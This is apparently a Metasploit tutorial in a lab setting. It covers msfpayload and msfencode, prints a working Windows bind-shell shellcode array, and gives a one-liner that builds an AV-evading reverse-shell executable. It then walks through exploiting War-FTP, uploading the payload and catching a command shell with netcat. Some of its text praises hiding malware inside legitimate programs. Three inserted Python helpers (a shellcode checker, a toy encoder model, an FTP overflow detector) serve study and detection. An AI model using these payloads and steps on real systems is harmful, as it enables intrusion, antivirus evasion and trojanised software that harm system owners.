GLIMPSES OF MSFPAYLOAD AND MSFENCODE, AND HOW TO IMPLEMENT THEM
Msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.
This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.
root@bt:~# msfpayload -h
Usage: /opt/framework/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:
    -h    Help banner
    -l    List available payloads
How powerful this tool can be is fully seen when showing the vast number of different types of shellcode that are available to be customized for your specific exploit:
root@bt:~# msfpayload -l

Framework Payloads (238 total)
==============================

    Name                              Description
    ----                              -----------
    aix/ppc/shell_bind_tcp            Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port           Spawn a shell on an established connection
    aix/ppc/shell_interact            Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp         Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp          Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp       Connect back to attacker and spawn a command shell
    bsd/x86/exec                      Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp           Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp        Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp            Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag            Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp         Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp            Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port           Spawn a shell on an established connection
    bsd/x86/shell_find_tag            Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp         Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp           Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp        Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp           Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port          Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp        Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd               Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat              Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_netcat_ipv6         Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_perl_ipv6           Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/bind_ruby_ipv6           Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                  Executes the supplied command
    cmd/unix/interact                 Interacts with a shell on an established socket connection
    cmd/unix/reverse                  Creates an interactive shell through two inbound connections
    cmd/unix/reverse_bash             Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_netcat           Creates an interactive shell via netcat
    cmd/unix/reverse_perl             Creates an interactive shell via perl
    cmd/unix/reverse_ruby             Connect back and create a command shell via Ruby
    cmd/windows/adduser               Create a new user and add them to local administration group
    cmd/windows/bind_perl             Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_perl_ipv6        Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby             Continually listen for a connection and spawn a command shell via Ruby
    cmd/windows/download_eval_vbs     Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.
    cmd/windows/download_exec_vbs     Download an EXE from an HTTP(S) URL and execute it
    cmd/windows/reverse_perl          Creates an interactive shell via perl
    cmd/windows/reverse_ruby          Connect back and create a command shell via Ruby
    generic/custom                    Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.
    generic/debug_trap                Generate a debug trap in the target process
    generic/shell_bind_tcp            Listen for a connection and spawn a command shell
    generic/shell_reverse_tcp         Connect back to attacker and spawn a command shell
    generic/tight_loop                Generate a tight loop in the target process
    java/jsp_shell_bind_tcp           Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp        Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp         Listen for a connection, Run a meterpreter server in Java
    java/meterpreter/reverse_http     Tunnel communication over HTTP, Run a meterpreter server in Java
    java/meterpreter/reverse_https    Tunnel communication over HTTPS, Run a meterpreter server in Java
    java/meterpreter/reverse_tcp      Connect back stager, Run a meterpreter server in Java
    java/shell/bind_tcp               Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell/reverse_tcp            Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell_reverse_tcp            Connect back to attacker and spawn a command shell
    linux/armle/adduser               Create a new user with UID 0
    linux/armle/exec                  Execute an arbitrary command
    linux/armle/shell_reverse_tcp     Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp    Connect back to attacker and spawn a command shell
    linux/mipsle/shell_reverse_tcp    Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp          Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port         Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp       Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp        Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port       Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp     Connect back to attacker and spawn a command shell
    linux/x64/exec                    Execute an arbitrary command
    linux/x64/shell/bind_tcp          Listen for a connection, Spawn a command shell (staged)
    linux/x64/shell/reverse_tcp       Connect back to the attacker, Spawn a command shell (staged)
    (listing truncated here)
Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.
root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902
  sf

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
As we can see from the output, this payload has three configurable options; the listing tells us whether each one is required, whether it has a default setting, and gives a short description:
- EXITFUNC
    - Required
    - Default setting: process
- LPORT
    - Required
    - Default setting: 4444
- RHOST
    - Not required
    - No default setting
Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902
  sf

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
LPORT     1234             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=1234, RHOST=, EXITFUNC=seh,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Now we have our fully customized shellcode to be used in any exploit!
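Before dropping msfpayload's C output into anything, it is worth checking that what you got is what the header claims. The Python helper below is an added example, not part of the original page and not Metasploit code: it parses the C array layout shown above (header comment, then a run of "\xNN" string literals), confirms the byte count against the "- N bytes" line, and reports any bytes from an avoid-list written the way msfencode's -b option expects it ('\x00\xff'). The embedded C text is constructed for the example and is not shellcode.

```python
import re

# Constructed sample in the same layout as msfpayload's C output
# (header comment, then a C char array of "\xNN" string literals).
# The bytes are made up for this example and are not shellcode.
SAMPLE_C_OUTPUT = r'''/*
 * example/payload - 12 bytes
 * http://www.metasploit.com
 * LPORT=1234, EXITFUNC=seh
 */
unsigned char buf[] =
"\x90\x31\xc0\x00\x41\x42"
"\xff\x43\x44\x0a\x0d\x45";
'''

# " * <payload name> - <N> bytes" inside the header comment
HEADER_RE = re.compile(r"\*\s*(?P<name>\S+)\s*-\s*(?P<size>\d+)\s*bytes")
# one C string literal made only of \xNN escapes
LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
# a single \xNN escape
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_c_output(text):
    """Return (payload_name, declared_size, payload_bytes) from msfpayload-style C output."""
    m = HEADER_RE.search(text)
    if m is None:
        raise ValueError("no msfpayload header comment found")
    chunks = LITERAL_RE.findall(text)
    data = bytes(int(h, 16) for chunk in chunks for h in ESCAPE_RE.findall(chunk))
    return m.group("name"), int(m.group("size")), data


def parse_badchars(spec):
    """Turn an avoid-list written like msfencode's -b argument (e.g. '\\x00\\xff') into a set of ints."""
    return {int(h, 16) for h in ESCAPE_RE.findall(spec)}


def check_payload(text, badchars=r"\x00\xff"):
    """Compare declared vs. actual size and list which avoid-list bytes are present."""
    name, declared, data = parse_c_output(text)
    avoid = parse_badchars(badchars)
    found = sorted({b for b in data if b in avoid})
    return {
        "name": name,
        "declared_size": declared,
        "actual_size": len(data),
        "size_matches": declared == len(data),
        "bad_bytes_present": found,
    }


if __name__ == "__main__":
    report = check_payload(SAMPLE_C_OUTPUT)
    for key, value in report.items():
        print("%-18s %s" % (key + ":", value))
```

Paste real msfpayload output in place of SAMPLE_C_OUTPUT to check a generated buffer; a size mismatch usually means a line was lost when copying, and a non-empty bad-byte list is the cue that the buffer needs to go through msfencode with -b.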
Msfencode is another tool included in the Metasploit Framework and is used to encode an exploit or payload. In many cases a basic exploit can be detected by virus scanners, but by encoding it we have a better chance of bypassing their detection routines and ensuring that our payload gets executed on the target system. In addition, recent updates to msfencode also allow us to encode a payload into an existing executable. This means you can take a normal application, encode it with our payload, and end up with an encoded copy of the executable containing the payload and ready to run on the target system. This goes very well with the concepts we've talked about with custom malware, where an actual usable program is sent to the target but our malware is sent with it.
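To make concrete why encoding defeats a byte-signature scanner, and what it does not hide, here is an added Python model. It is not Metasploit's code, and its "encoder" is a deliberately toy scheme, not the x86/shikata_ga_nai algorithm: one single-byte XOR pass with a small constant stub in front, repeated the way msfencode's -c option wraps each pass around the previous output, plus a key search that avoids given bad bytes the way -b does. The payload bytes, the signature and the stub marker are all constructed placeholders, not machine code.

```python
import random

# Constructed placeholders; none of these bytes are machine code.
RAW_PAYLOAD = b"\x90\x90PAYLOAD-BODY-CONSTRUCTED\x00\xff"
AV_SIGNATURE = b"PAYLOAD-BODY"   # what a naive byte-signature scanner matches on
STUB_MAGIC = b"\xde\xc0\xde"     # stands in for the constant decoder loop a real encoder prepends


def _keystream(key, length):
    # Toy scheme: a single-byte key that steps by one per position,
    # so a zero key byte only ever falls on one position.
    return bytes((key + i) & 0xFF for i in range(length))


def xor_pass(data, key):
    """XOR data against the toy keystream; applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, _keystream(key, len(data))))


def encode_once(data, key):
    """One encoding pass: toy decoder stub (magic + key byte) followed by the XOR-ed body."""
    return STUB_MAGIC + bytes([key]) + xor_pass(data, key)


def decode_once(blob):
    """What the stub would do at run time: read the key back and undo the XOR pass."""
    if not blob.startswith(STUB_MAGIC):
        raise ValueError("blob was not produced by the toy encoder")
    key = blob[len(STUB_MAGIC)]
    return xor_pass(blob[len(STUB_MAGIC) + 1:], key)


def encode(data, iterations=1, seed=0):
    """Model of msfencode -c N: each pass wraps the whole output of the previous pass."""
    rng = random.Random(seed)
    out = data
    for _ in range(iterations):
        out = encode_once(out, rng.randrange(256))
    return out


def decode(blob, iterations=1):
    """Peel off the passes in reverse order."""
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob


def signature_hit(blob, signature=AV_SIGNATURE):
    """Naive scanner: does the exact byte pattern occur anywhere in the blob?"""
    return signature in blob


def key_avoiding(data, badchars):
    """Model of msfencode -b: find a key whose complete output (stub included)
    contains none of the bad bytes, or None if no single-byte key works."""
    for key in range(256):
        if not any(b in badchars for b in encode_once(data, key)):
            return key
    return None


if __name__ == "__main__":
    blob = encode(RAW_PAYLOAD, iterations=3)
    print("raw body matches signature:    ", signature_hit(RAW_PAYLOAD))
    print("encoded blob matches signature:", signature_hit(blob))
    print("encoded blob still has stub:   ", signature_hit(blob, STUB_MAGIC))
    print("decoded == raw:                ", decode(blob, iterations=3) == RAW_PAYLOAD)
    print("key avoiding \\x00\\xff:         ", key_avoiding(RAW_PAYLOAD, {0x00, 0xFF}))
```

The point for detection engineering: the signature written for the raw body misses every encoded variant, no matter how many passes, but the constant stub still matches each time, which is why scanners and IDS rules target decoder stubs (and runtime behaviour) rather than payload bodies. The key search also shows why -b can fail for a long avoid-list: every extra bad byte removes candidate keys, and when none is left msfencode has to fall back to another encoder.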
One of the easiest ways to use msfencode is to pipe the output from msfpayload directly into it. After you determine which encoding method you want to use, you then determine which format you want to receive the result in, similar to
root@bt:~# msfencode -l

Framework Encoders
==================

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
root@bt:~# msfencode -h

    Usage: /opt/framework/msf3/msfencode <options>

OPTIONS:

    -a <opt>    The architecture to encode as
    -b <opt>    The list of characters to avoid: '\x00\xff'
    -c <opt>    The number of times to encode the data
    -d <opt>    Specify the directory in which to look for EXE templates
    -e <opt>    The encoder to use
    -h          Help banner
    -i <opt>    Encode the contents of the supplied file path
    -k          Keep template working; run payload in new thread (use with -x)
    -l          List available encoders
    -m <opt>    Specifies an additional module search path
    -n          Dump encoder information
    -o <opt>    The output file
    -p <opt>    The platform to encode for
    -s <opt>    The maximum size of the encoded data
    -t <opt>    The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,war
    -v          Increase verbosity
    -x <opt>    Specify an alternate executable template
Output: msfencode encodes the provided data using the options specified on the command line, in the chosen output format.
A typical invocation:
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /pentest/exploits/ardy.exe
IMPLEMENT
Our target here is War-FTP. Open msfconsole and follow along like this:
root@bt:~# msfconsole

[Metasploit ASCII-art banner]

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 133 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14682 updated 25 days ago (2012.02.03)

Warning: This copy of the Metasploit Framework was last updated 25 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/ftp/warftpd_165_user
msf  exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port

msf  exploit(warftpd_165_user) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf  exploit(warftpd_165_user) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 English
   1   Windows XP SP0-SP1 English
   2   Windows XP SP2 English
   3   Windows XP SP3 English

msf  exploit(warftpd_165_user) > set target 3
target => 3
msf  exploit(warftpd_165_user) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Trying target Windows XP SP3 English...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1031) at 2012-02-28 00:48:07 +0700

meterpreter >
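Seen from the defending side, the module above reaches War-FTP through the FTP USER command, so the attempt leaves a trace in the server's command log. The following Python detector is an added example, not part of the page and not Metasploit code: it scans FTP command log lines for the anomalies such an attempt leaves behind, namely an argument far longer than any real username, non-printable bytes, and a long run of one repeated byte. The "date time client COMMAND argument" log layout, the 128-byte length threshold and the 8-byte run threshold are assumptions for the example; the sample lines are constructed, not a real War-FTP log.

```python
import re
import string
from itertools import groupby

# Constructed log lines in an assumed "date time client COMMAND argument" layout.
# This is not War-FTP's own log format; adapt LINE_RE to the real one.
SAMPLE_LOG_LINES = [
    "2012-02-28 00:47:51 192.168.56.50 USER anonymous",
    "2012-02-28 00:47:51 192.168.56.50 PASS mozilla@example.com",
    "2012-02-28 00:48:05 192.168.56.1 USER " + "A" * 600,                 # oversized username
    "2012-02-28 00:48:06 192.168.56.1 USER " + "\x90" * 16 + "\x41\x42",  # non-printable bytes
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$"
)

MAX_ARG_LEN = 128   # assumed threshold: real usernames and passwords are far shorter
MIN_RUN_LEN = 8     # assumed threshold for "the same byte repeated many times"
PRINTABLE = set(string.printable) - set("\x0b\x0c\r\n")


def longest_run(text):
    """Length of the longest run of one repeated character (0 for empty input)."""
    return max((len(list(g)) for _, g in groupby(text)), default=0)


def analyze_line(line):
    """Parse one log line and list the reasons (if any) it looks like an overflow attempt."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    arg = m.group("arg") or ""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    if any(ch not in PRINTABLE for ch in arg):
        reasons.append("non-printable bytes in argument")
    run = longest_run(arg)
    if run >= MIN_RUN_LEN:
        reasons.append("run of %d identical bytes" % run)
    return {
        "time": m.group("ts"),
        "client": m.group("client"),
        "cmd": m.group("cmd"),
        "reasons": reasons,
    }


def find_overflow_attempts(lines):
    """Return the analysed record for every line that triggered at least one reason."""
    hits = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in find_overflow_attempts(SAMPLE_LOG_LINES):
        print(rec["time"], rec["client"], rec["cmd"], "; ".join(rec["reasons"]))
```

Each hit carries the client address and the reasons it fired, which is what an analyst needs to pivot to the reverse-handler connection that follows a successful attempt (here the session opened from 192.168.56.101 back to 192.168.56.1:4444). Keeping the thresholds as named constants makes them easy to tune against a real server's traffic before alerting on them.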
Once we are in Meterpreter, we generate an executable (.exe) file with the command:
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /pentest/exploits/ardy.exe
windows/shell_reverse_tcp --> This is the payload we use here; it is not the only possible payload, but it is the one this walkthrough uses.
msfencode -e x86/shikata_ga_nai -t exe --> This selects the encoder for the payload we are going to use, because without it we have no way to know the bad characters.
Next we upload the file to the target, which is running Windows XP, by typing this command in the msfconsole Meterpreter session:
meterpreter > upload /pentest/exploits/ardy.exe C:\\
After the upload, we start listening on the BackTrack machine from a console with the command:
root@bt:~# nc -l -p 4444
Then we run the uploaded file on the Windows XP machine, which results in the following:
root@bt:~# nc -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
After that, good luck!